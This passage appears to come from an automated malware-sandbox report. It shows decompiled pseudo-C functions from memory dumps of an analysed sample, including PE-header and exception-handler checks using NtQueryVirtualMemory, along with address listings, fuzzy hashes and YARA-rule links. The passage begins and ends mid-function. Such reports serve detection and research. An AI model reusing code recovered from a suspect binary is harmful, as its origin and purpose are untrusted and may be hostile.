									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x100041c0 = 1;
							__eflags =  *0x100041c0;
							if( *0x100041c0 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x100041c0 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x10004180 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x10004178 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x10004180 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x10004180 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                                                          0x100023af
                                                          0x100023b2
                                                          0x100023b8
                                                          0x100023d6
                                                          0x00000000
                                                          0x100023d6
                                                          0x100023c0
                                                          0x100023c9
                                                          0x100023cf
                                                          0x100023de
                                                          0x100023e1
                                                          0x100023e4
                                                          0x100023ee
                                                          0x100023ee
                                                          0x100023f0
                                                          0x100023f3
                                                          0x100023f5
                                                          0x100023f5
                                                          0x100023f7
                                                          0x100023fa
                                                          0x00000000
                                                          0x00000000
                                                          0x100023fc
                                                          0x100023fe
                                                          0x10002464
                                                          0x10002464
                                                          0x100025c2
                                                          0x00000000
                                                          0x100025c2
                                                          0x10002400
                                                          0x10002400
                                                          0x10002404
                                                          0x10002406
                                                          0x10002406
                                                          0x10002406
                                                          0x10002406
                                                          0x10002409
                                                          0x1000240a
                                                          0x1000240d
                                                          0x1000240d
                                                          0x10002411
                                                          0x10002415
                                                          0x10002423
                                                          0x10002423
                                                          0x1000242b
                                                          0x10002431
                                                          0x10002433
                                                          0x10002435
                                                          0x10002445
                                                          0x10002452
                                                          0x10002456
                                                          0x1000245b
                                                          0x1000245d
                                                          0x100024db
                                                          0x100024db
                                                          0x1000245f
                                                          0x1000245f
                                                          0x1000245f
                                                          0x100024dd
                                                          0x100024df
                                                          0x100025c0
                                                          0x100025c0
                                                          0x00000000
                                                          0x100024e5
                                                          0x100024e5
                                                          0x100024ec
                                                          0x00000000
                                                          0x00000000
                                                          0x100024f2
                                                          0x100024f6
                                                          0x10002552
                                                          0x10002554
                                                          0x1000255c
                                                          0x1000255e
                                                          0x10002560
                                                          0x00000000
                                                          0x00000000
                                                          0x10002562
                                                          0x10002568
                                                          0x1000256a
                                                          0x1000256c
                                                          0x10002581
                                                          0x10002581
                                                          0x10002583
                                                          0x100025b2
                                                          0x100025b9
                                                          0x00000000
                                                          0x100025b9
                                                          0x10002587
                                                          0x10002588
                                                          0x1000258a
                                                          0x1000258c
                                                          0x1000258c
                                                          0x1000258e
                                                          0x10002590
                                                          0x10002592
                                                          0x100025a6
                                                          0x100025a6
                                                          0x100025a9
                                                          0x100025ab
                                                          0x100025ab
                                                          0x100025ac
                                                          0x100025ac
                                                          0x00000000
                                                          0x10002594
                                                          0x10002594
                                                          0x10002594
                                                          0x1000259d
                                                          0x1000259e
                                                          0x100025a0
                                                          0x100025a2
                                                          0x100025a2
                                                          0x00000000
                                                          0x10002594
                                                          0x10002592
                                                          0x1000256e
                                                          0x10002575
                                                          0x10002575
                                                          0x10002577
                                                          0x00000000
                                                          0x00000000
                                                          0x10002579
                                                          0x1000257a
                                                          0x1000257d
                                                          0x1000257f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x1000257f
                                                          0x00000000
                                                          0x10002575
                                                          0x100024f8
                                                          0x100024fb
                                                          0x10002500
                                                          0x00000000
                                                          0x00000000
                                                          0x10002509
                                                          0x1000250b
                                                          0x10002511
                                                          0x00000000
                                                          0x00000000
                                                          0x10002517
                                                          0x1000251d
                                                          0x00000000
                                                          0x00000000
                                                          0x10002523
                                                          0x10002525
                                                          0x1000252e
                                                          0x10002532
                                                          0x00000000
                                                          0x00000000
                                                          0x10002538
                                                          0x1000253b
                                                          0x1000253d
                                                          0x00000000
                                                          0x00000000
                                                          0x10002544
                                                          0x10002546
                                                          0x00000000
                                                          0x00000000
                                                          0x10002548
                                                          0x1000254c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x1000254c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x10002437
                                                          0x10002437
                                                          0x10002437
                                                          0x1000243e
                                                          0x00000000
                                                          0x00000000
                                                          0x10002440
                                                          0x10002441
                                                          0x10002443
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x10002443
                                                          0x1000246b
                                                          0x1000246d
                                                          0x00000000
                                                          0x00000000
                                                          0x1000247d
                                                          0x1000247f
                                                          0x10002481
                                                          0x00000000
                                                          0x00000000
                                                          0x10002487
                                                          0x1000248e
                                                          0x100024ba
                                                          0x100024ba
                                                          0x100024bc
                                                          0x100024be
                                                          0x100024d2
                                                          0x100024d4
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x100024c0
                                                          0x100024c0
                                                          0x100024c0
                                                          0x100024c9
                                                          0x100024ca
                                                          0x100024cc
                                                          0x100024ce
                                                          0x100024ce
                                                          0x00000000
                                                          0x100024c0
                                                          0x10002490
                                                          0x10002493
                                                          0x10002495
                                                          0x100024a7
                                                          0x100024a7
                                                          0x100024aa
                                                          0x100024ac
                                                          0x100024ac
                                                          0x100024ad
                                                          0x100024ad
                                                          0x100024b3
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x10002497
                                                          0x10002497
                                                          0x10002497
                                                          0x1000249e
                                                          0x00000000
                                                          0x00000000
                                                          0x100024a0
                                                          0x100024a0
                                                          0x100024a1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x100024a1
                                                          0x100024a3
                                                          0x100024a5
                                                          0x100024b8
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x100024b8
                                                          0x00000000
                                                          0x100024a5
                                                          0x10002417
                                                          0x1000241a
                                                          0x1000241d
                                                          0x00000000
                                                          0x00000000
                                                          0x1000241f
                                                          0x10002421
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x10002421
                                                          0x100023e6
                                                          0x100023e8
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 10002456
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.490150047.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.490223790.0000000010005000.00000040.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: MemoryQueryVirtual
                                                          • String ID:
                                                          • API String ID: 2850889275-0
                                                          • Opcode ID: f62d227e9841d083b4fdee57b41ca73a4ae578112d3fc6a9bbbab911f867f479
                                                          • Instruction ID: d6971719ee8f1b9f11e38fe3953f76bbe497b20de1934e034d516acabf99b4ad
                                                          • Opcode Fuzzy Hash: f62d227e9841d083b4fdee57b41ca73a4ae578112d3fc6a9bbbab911f867f479
                                                          • Instruction Fuzzy Hash: AC61EE70A00A56DFFB19CF28DCE065933E5EB853D5F228469D806C729DEB30DD828754
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 005EB1A5, Relevance: 1.7, APIs: 1, Instructions: 195nativeCOMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E005EB1A5(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x5ed2e0; // 0x0
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x5ed328 = 1;
										__eflags =  *0x5ed328;
										if( *0x5ed328 != 0) {
											goto L60;
										}
										_t84 =  *0x5ed2e0; // 0x0
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x5ed328 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x5ed2e0 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x5ed2e8 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x5ed2e4 + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x5ed2e8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x5ed2e8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x5ed328 = 1;
							__eflags =  *0x5ed328;
							if( *0x5ed328 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x5ed2e8 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x5ed2e8 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x5ed328 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x5ed2e8 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t25 = _t81 - 1; // -1
							_t58 = _t25;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x5ed2e0 = _t81;
								}
								_t28 = _t81 - 1; // 0x0
								_t58 = _t28;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x5ed2e8 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x5ed2e8 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                                                          0x005eb1af
                                                          0x005eb1b2
                                                          0x005eb1b8
                                                          0x005eb1d6
                                                          0x00000000
                                                          0x005eb1d6
                                                          0x005eb1c0
                                                          0x005eb1c9
                                                          0x005eb1cf
                                                          0x005eb1de
                                                          0x005eb1e1
                                                          0x005eb1e4
                                                          0x005eb1ee
                                                          0x005eb1ee
                                                          0x005eb1f0
                                                          0x005eb1f3
                                                          0x005eb1f5
                                                          0x005eb1f5
                                                          0x005eb1f7
                                                          0x005eb1fa
                                                          0x00000000
                                                          0x00000000
                                                          0x005eb1fc
                                                          0x005eb1fe
                                                          0x005eb264
                                                          0x005eb264
                                                          0x005eb3c2
                                                          0x00000000
                                                          0x005eb3c2
                                                          0x005eb200
                                                          0x005eb200
                                                          0x005eb204
                                                          0x005eb206
                                                          0x005eb206
                                                          0x005eb206
                                                          0x005eb206
                                                          0x005eb209
                                                          0x005eb20a
                                                          0x005eb20d
                                                          0x005eb20d
                                                          0x005eb211
                                                          0x005eb215
                                                          0x005eb223
                                                          0x005eb223
                                                          0x005eb22b
                                                          0x005eb231
                                                          0x005eb233
                                                          0x005eb235
                                                          0x005eb245
                                                          0x005eb252
                                                          0x005eb256
                                                          0x005eb25b
                                                          0x005eb25d
                                                          0x005eb2db
                                                          0x005eb2db
                                                          0x005eb25f
                                                          0x005eb25f
                                                          0x005eb25f
                                                          0x005eb2dd
                                                          0x005eb2df
                                                          0x005eb3c0
                                                          0x005eb3c0
                                                          0x00000000
                                                          0x005eb2e5
                                                          0x005eb2e5
                                                          0x005eb2ec
                                                          0x00000000
                                                          0x00000000
                                                          0x005eb2f2
                                                          0x005eb2f6
                                                          0x005eb352
                                                          0x005eb354
                                                          0x005eb35c
                                                          0x005eb35e
                                                          0x005eb360
                                                          0x00000000
                                                          0x00000000
                                                          0x005eb362
                                                          0x005eb368
                                                          0x005eb36a
                                                          0x005eb36c
                                                          0x005eb381
                                                          0x005eb381
                                                          0x005eb383
                                                          0x005eb3b2
                                                          0x005eb3b9
                                                          0x00000000
                                                          0x005eb3b9
                                                          0x005eb387
                                                          0x005eb388
                                                          0x005eb38a
                                                          0x005eb38c
                                                          0x005eb38c
                                                          0x005eb38e
                                                          0x005eb390
                                                          0x005eb392
                                                          0x005eb3a6
                                                          0x005eb3a6
                                                          0x005eb3a9
                                                          0x005eb3ab
                                                          0x005eb3ab
                                                          0x005eb3ac
                                                          0x005eb3ac
                                                          0x00000000
                                                          0x005eb394
                                                          0x005eb394
                                                          0x005eb394
                                                          0x005eb39d
                                                          0x005eb39e
                                                          0x005eb3a0
                                                          0x005eb3a2
                                                          0x005eb3a2
                                                          0x00000000
                                                          0x005eb394
                                                          0x005eb392
                                                          0x005eb36e
                                                          0x005eb375
                                                          0x005eb375
                                                          0x005eb377
                                                          0x00000000
                                                          0x00000000
                                                          0x005eb379
                                                          0x005eb37a
                                                          0x005eb37d
                                                          0x005eb37f
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x005eb37f
                                                          0x00000000
                                                          0x005eb375
                                                          0x005eb2f8
                                                          0x005eb2fb
                                                          0x005eb300
                                                          0x00000000
                                                          0x00000000
                                                          0x005eb309
                                                          0x005eb30b
                                                          0x005eb311
                                                          0x00000000
                                                          0x00000000
                                                          0x005eb317
                                                          0x005eb31d
                                                          0x00000000
                                                          0x00000000
                                                          0x005eb323
                                                          0x005eb325
                                                          0x005eb32e
                                                          0x005eb332
                                                          0x00000000
                                                          0x00000000
                                                          0x005eb338
                                                          0x005eb33b
                                                          0x005eb33d
                                                          0x00000000
                                                          0x00000000
                                                          0x005eb344
                                                          0x005eb346
                                                          0x00000000
                                                          0x00000000
                                                          0x005eb348
                                                          0x005eb34c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x005eb34c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x005eb237
                                                          0x005eb237
                                                          0x005eb237
                                                          0x005eb23e
                                                          0x00000000
                                                          0x00000000
                                                          0x005eb240
                                                          0x005eb241
                                                          0x005eb243
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x005eb243
                                                          0x005eb26b
                                                          0x005eb26d
                                                          0x00000000
                                                          0x00000000
                                                          0x005eb27d
                                                          0x005eb27f
                                                          0x005eb281
                                                          0x00000000
                                                          0x00000000
                                                          0x005eb287
                                                          0x005eb28e
                                                          0x005eb2ba
                                                          0x005eb2ba
                                                          0x005eb2bc
                                                          0x005eb2be
                                                          0x005eb2d2
                                                          0x005eb2d4
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x005eb2c0
                                                          0x005eb2c0
                                                          0x005eb2c0
                                                          0x005eb2c9
                                                          0x005eb2ca
                                                          0x005eb2cc
                                                          0x005eb2ce
                                                          0x005eb2ce
                                                          0x00000000
                                                          0x005eb2c0
                                                          0x005eb290
                                                          0x005eb290
                                                          0x005eb293
                                                          0x005eb295
                                                          0x005eb2a7
                                                          0x005eb2a7
                                                          0x005eb2aa
                                                          0x005eb2ac
                                                          0x005eb2ac
                                                          0x005eb2ad
                                                          0x005eb2ad
                                                          0x005eb2b3
                                                          0x005eb2b3
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x005eb297
                                                          0x005eb297
                                                          0x005eb297
                                                          0x005eb29e
                                                          0x00000000
                                                          0x00000000
                                                          0x005eb2a0
                                                          0x005eb2a0
                                                          0x005eb2a1
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x005eb2a1
                                                          0x005eb2a3
                                                          0x005eb2a5
                                                          0x005eb2b8
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x005eb2b8
                                                          0x00000000
                                                          0x005eb2a5
                                                          0x005eb217
                                                          0x005eb21a
                                                          0x005eb21d
                                                          0x00000000
                                                          0x00000000
                                                          0x005eb21f
                                                          0x005eb221
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x005eb221
                                                          0x005eb1e6
                                                          0x005eb1e8
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000

                                                          APIs
                                                          • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 005EB256
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.481263271.00000000005E1000.00000020.00000001.sdmp, Offset: 005E0000, based on PE: true
                                                          • Associated: 00000000.00000002.481213355.00000000005E0000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481412685.00000000005EC000.00000002.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481496778.00000000005ED000.00000004.00000001.sdmp Download File
                                                          • Associated: 00000000.00000002.481624504.00000000005EF000.00000002.00000001.sdmp Download File
                                                          Similarity
                                                          • API ID: MemoryQueryVirtual
                                                          • String ID:
                                                          • API String ID: 2850889275-0
                                                          • Opcode ID: c0f8d585c373f89eeb161d4691e07d797f2c0720426d7d603fcb04857eaf6caa
                                                          • Instruction ID: 4b42b2d790c884d639979825349fe2eb99447269c4a842a4fa4406b18d371a0b
                                                          • Opcode Fuzzy Hash: c0f8d585c373f89eeb161d4691e07d797f2c0720426d7d603fcb04857eaf6caa
                                                          • Instruction Fuzzy Hash: B161D534A006C68BEB2DCB6AC8D162B7BB1FF89352B248928DAD5CB195E730DD41C750
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 003D06DF, Relevance: 1.4, Strings: 1, Instructions: 146COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.478797808.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: t32c
                                                          • API String ID: 0-3674199949
                                                          • Opcode ID: 828266d287079a67e90bb63de15d039b8ebdc90fbf9156d09c1244c441a8cb29
                                                          • Instruction ID: 3e93e3dd3c109643957f8861015970eda04c4c469a0c1bde566b1b27e8379674
                                                          • Opcode Fuzzy Hash: 828266d287079a67e90bb63de15d039b8ebdc90fbf9156d09c1244c441a8cb29
                                                          • Instruction Fuzzy Hash: E8513A36A0011ADFEF19CF80ED80BA9B7B5FF84724F159196D8086B216D330AE81DF80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 003D07C8, Relevance: 1.4, Strings: 1, Instructions: 135COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.478797808.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: t32c
                                                          • API String ID: 0-3674199949
                                                          • Opcode ID: 9be74e8784058956d3d0e1d51691f2de95a7e6e82703f31b8ffc071a0f4e2f9d
                                                          • Instruction ID: 925f4a17889e56e567bc882ce7c7da27f63af426d1b90e5df13bca6c3007e9b3
                                                          • Opcode Fuzzy Hash: 9be74e8784058956d3d0e1d51691f2de95a7e6e82703f31b8ffc071a0f4e2f9d
                                                          • Instruction Fuzzy Hash: 88513C37900219DFEF29CF44ED84BA9B7B5FB84720F164596D948AB212D330AE85DF90
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 003D08B4, Relevance: 1.4, Strings: 1, Instructions: 118COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.478797808.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: t32c
                                                          • API String ID: 0-3674199949
                                                          • Opcode ID: abaadb2879f379325fb3bbad3f9210c685a4b7abdd33d206becd0bd23f4365f0
                                                          • Instruction ID: 2ba898d9843709d55ae23a564de199444092d96110ddec2f3b7443f3d8dfa96a
                                                          • Opcode Fuzzy Hash: abaadb2879f379325fb3bbad3f9210c685a4b7abdd33d206becd0bd23f4365f0
                                                          • Instruction Fuzzy Hash: 83418C76A00215DFEB25CF94DD80BA9B7B5FF88B20F159199D9496B356C330AE80CF84
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 003D0823, Relevance: 1.4, Strings: 1, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.478797808.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID: t32c
                                                          • API String ID: 0-3674199949
                                                          • Opcode ID: cb4569934cfb242ab8479b452e4947835aa05f6b5d33f9c3cac1d2f6c4cfee46
                                                          • Instruction ID: 0124c02e40505f86805df9e37470596f0c3ee253a22d965a8f1cc258ad30eed1
                                                          • Opcode Fuzzy Hash: cb4569934cfb242ab8479b452e4947835aa05f6b5d33f9c3cac1d2f6c4cfee46
                                                          • Instruction Fuzzy Hash: 3C415F36900219DFEB25DF44ED84BA9B7B5FF88B20F159196D8486B316D330AE85DF80
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 003D0A7E, Relevance: .1, Instructions: 90COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.478797808.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 7a5a822f048ab97aed3860515fa9c210a1164ba75451d97788b306884a8adc05
                                                          • Instruction ID: 59bda47f945de4e9f54359d5d901e5c2174c534a9bfcc7e2af8ba395cf87635b
                                                          • Opcode Fuzzy Hash: 7a5a822f048ab97aed3860515fa9c210a1164ba75451d97788b306884a8adc05
                                                          • Instruction Fuzzy Hash: F62172864802A13FFFF254B895BB3D717A8C76B7D0FA5B819C8108B582945C279F7280
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 003D0A80, Relevance: .1, Instructions: 89COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.478797808.00000000003D0000.00000040.00000001.sdmp, Offset: 003D0000, based on PE: false
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 917b2a3dae72067c6ea85b97dde3592e1f4505ed00f386ed982949e072a7d54e
                                                          • Instruction ID: 36089c5b7bbc9b36a396397b27ed7fbb17e3de091ac510888181af3bc773516c
                                                          • Opcode Fuzzy Hash: 917b2a3dae72067c6ea85b97dde3592e1f4505ed00f386ed982949e072a7d54e
                                                          • Instruction Fuzzy Hash: CE2183864402A13FFFF254B895BB3C717A8C76B7D0FA5B819C8108B582945C27DF7280
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 10002184, Relevance: .1, Instructions: 77COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 71%
                                                          			E10002184(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
